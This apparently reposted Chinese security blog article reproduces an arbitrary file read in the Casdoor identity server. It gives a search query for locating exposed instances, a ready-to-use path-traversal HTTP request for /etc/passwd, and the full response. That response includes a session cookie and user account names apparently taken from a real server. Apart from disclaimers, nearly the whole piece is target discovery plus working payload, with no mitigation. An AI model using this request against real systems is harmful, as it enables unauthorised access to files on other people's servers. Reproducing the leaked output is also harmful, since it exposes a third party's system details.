【漏洞复现】Casdoor任意文件读取漏洞

admin
admin
admin
140350
文章
117
评论
2023年10月14日02:27:05评论98 views字数 2234阅读7分26秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

资产收集

web.title="Casdoor"

【漏洞复现】Casdoor任意文件读取漏洞

漏洞复现

【漏洞复现】Casdoor任意文件读取漏洞

构造请求

GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1Host: xx.xx.xx.xx:9999User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

请求包会返回如下请求

HTTP/1.1 200 OKAccept-Ranges: bytesContent-Type: text/plain; charset=utf-8Last-Modified: Wed, 22 Feb 2023 06:06:26 GMTSet-Cookie: casdoor_session_id=63f5be26311907baf61aa506b105b441; Path=/; Expires=Tue, 07 Nov 2023 06:55:04 GMT; Max-Age=2592000; HttpOnlyDate: Sun, 08 Oct 2023 06:55:04 GMTConnection: closeContent-Length: 1546
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinsystemd-network:x:192:192:systemd Network Management:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinpolkitd:x:999:998:User for polkitd:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpostfix:x:89:89::/var/spool/postfix:/sbin/nologinchrony:x:998:996::/var/lib/chrony:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinnginx:x:997:995:Nginx web server:/var/lib/nginx:/sbin/nologinapache:x:48:48:Apache:/usr/share/httpd:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/falseredis:x:996:992:Redis Database Server:/var/lib/redis:/sbin/nologinclamupdate:x:995:991:Clamav database update user:/var/lib/clamav:/sbin/nologintss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologinclamscan:x:994:989:Clamav scanner user:/:/sbin/nologinecs-assist-user:x:1002:1006::/home/ecs-assist-user:/sbin/nologinlishuo:x:1003:1003::/home/lishuo:/bin/bashcaozhihao:x:1004:1010::/home/caozhihao:/bin/bash

【漏洞复现】Casdoor任意文件读取漏洞


原文始发于微信公众号(Devil安全):【漏洞复现】Casdoor任意文件读取漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月14日02:27:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】Casdoor任意文件读取漏洞https://cn-sec.com/archives/2098992.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息